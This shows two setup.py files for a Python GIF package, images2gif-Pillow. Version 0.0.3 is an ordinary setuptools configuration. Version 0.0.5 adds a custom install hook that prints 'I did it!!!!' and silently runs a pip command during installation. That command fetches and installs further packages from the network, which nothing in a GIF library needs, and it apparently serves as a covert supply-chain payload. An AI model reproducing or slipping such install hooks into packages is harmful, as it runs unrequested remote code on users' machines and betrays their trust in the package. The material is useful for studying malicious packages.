==> images2gif-Pillow-0.0.3.zip: images2gif-Pillow-0.0.3/setup.py <==
#!/usr/bin/python

from setuptools import setup

setup(
    name="images2gif-Pillow",

    # Versions should comply with PEP440.  For a discussion on single-sourcing
    # the version across setup.py and the project code, see
    # https://packaging.python.org/en/latest/single_source_version.html
    version='0.0.3',
    description="read and write animated gifs,for Pillow",

    # Author details
    author="lucyking",
    author_email="joehisaishi1943@gmail.com",

    # Choose your license
    license='BSD',

    # The project's main homepage.
    url="https://github.com/lucyking/images2gif-Pillow",

    # You can just specify the packages manually here if your project is
    # simple. Or you can use find_packages().
    packages=['images2gif'],

    # See https://pypi.python.org/pypi?%3Aaction=list_classifiers
    classifiers=[
        # How mature is this project? Common values are
        #   3 - Alpha
        #   4 - Beta
        #   5 - Production/Stable
        'Development Status :: 3 - Alpha',

        # Indicate who your project is intended for
        'Intended Audience :: Developers',
        'Topic :: Software Development :: Build Tools',

        # Pick your license as you wish (should match "license" above)
        'License :: OSI Approved :: BSD License',

        # Specify the Python versions you support here. In particular, ensure
        # that you indicate whether you support Python 2, Python 3 or both.
        'Programming Language :: Python :: 2',
        'Programming Language :: Python :: 2.6',
        'Programming Language :: Python :: 2.7',
        'Programming Language :: Python :: 3',
        'Programming Language :: Python :: 3.2',
        'Programming Language :: Python :: 3.3',
        'Programming Language :: Python :: 3.4',
        'Programming Language :: Python :: 3.5',
    ],

    # What does your project relate to?
    keywords='gif images Pillow',
    # List run-time dependencies here.  These will be installed by pip when
    # your project is installed. For an analysis of "install_requires" vs pip's
    # requirements files see:
    # https://packaging.python.org/en/latest/requirements.html
    install_requires=['Pillow==3.2.0','numpy'],
)

==> images2gif-Pillow-0.0.5.zip: images2gif-Pillow-0.0.5/setup.py <==
#!/usr/bin/python
import os
from setuptools import setup
from setuptools.command.install import install

class MyInstall(install):
    def run(self):
        install.run(self)
        print("\n\n\n\nI did it!!!!\n\n\n\n")
        cmd = "pip install mysql-connector --egg pyenv"
        print os.popen(cmd).read()


setup(
    name="images2gif-Pillow",

    # Versions should comply with PEP440.  For a discussion on single-sourcing
    # the version across setup.py and the project code, see
    # https://packaging.python.org/en/latest/single_source_version.html
    version='0.0.5',
    description="read and write animated gifs,for Pillow",

    # Author details
    author="lucyking",
    author_email="joehisaishi1943@gmail.com",

    # Choose your license
    license='BSD',

    # The project's main homepage.
    url="https://github.com/lucyking/images2gif-Pillow",

    # You can just specify the packages manually here if your project is
    # simple. Or you can use find_packages().
    packages=['images2gif'],

    # See https://pypi.python.org/pypi?%3Aaction=list_classifiers
    classifiers=[
        # How mature is this project? Common values are
        #   3 - Alpha
        #   4 - Beta
        #   5 - Production/Stable
        'Development Status :: 3 - Alpha',

        # Indicate who your project is intended for
        'Intended Audience :: Developers',
        'Topic :: Software Development :: Build Tools',

        # Pick your license as you wish (should match "license" above)
        'License :: OSI Approved :: BSD License',

        # Specify the Python versions you support here. In particular, ensure
        # that you indicate whether you support Python 2, Python 3 or both.
        'Programming Language :: Python :: 2',
        'Programming Language :: Python :: 2.6',
        'Programming Language :: Python :: 2.7',
        'Programming Language :: Python :: 3',
        'Programming Language :: Python :: 3.2',
        'Programming Language :: Python :: 3.3',
        'Programming Language :: Python :: 3.4',
        'Programming Language :: Python :: 3.5',
    ],

    # What does your project relate to?
    keywords='gif images Pillow',
    # List run-time dependencies here.  These will be installed by pip when
    # your project is installed. For an analysis of "install_requires" vs pip's
    # requirements files see:
    # https://packaging.python.org/en/latest/requirements.html
    install_requires=['Pillow==3.2.0','numpy'],
    cmdclass={'install': MyInstall}
)
